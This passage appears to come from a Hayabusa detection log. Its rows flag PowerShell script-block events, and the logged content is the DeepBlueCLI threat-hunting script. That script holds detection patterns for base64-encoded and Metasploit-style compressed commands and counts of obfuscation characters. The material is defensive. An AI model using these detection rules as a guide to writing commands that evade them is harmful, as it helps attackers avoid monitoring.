typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. 
(Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. 
$servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. 
$output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $output += $eventxml.Event.EventData.Data[4].""#text"" $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" 
+ $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" 
{$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n""",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:44:35.127 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. 
.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $output += $eventxml.Event.EventData.Data[4].""#text"" $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" 
{$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:44:35.127 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:44:35.127 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"$text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. 
Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:44:35.127 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"$text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. 
# I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
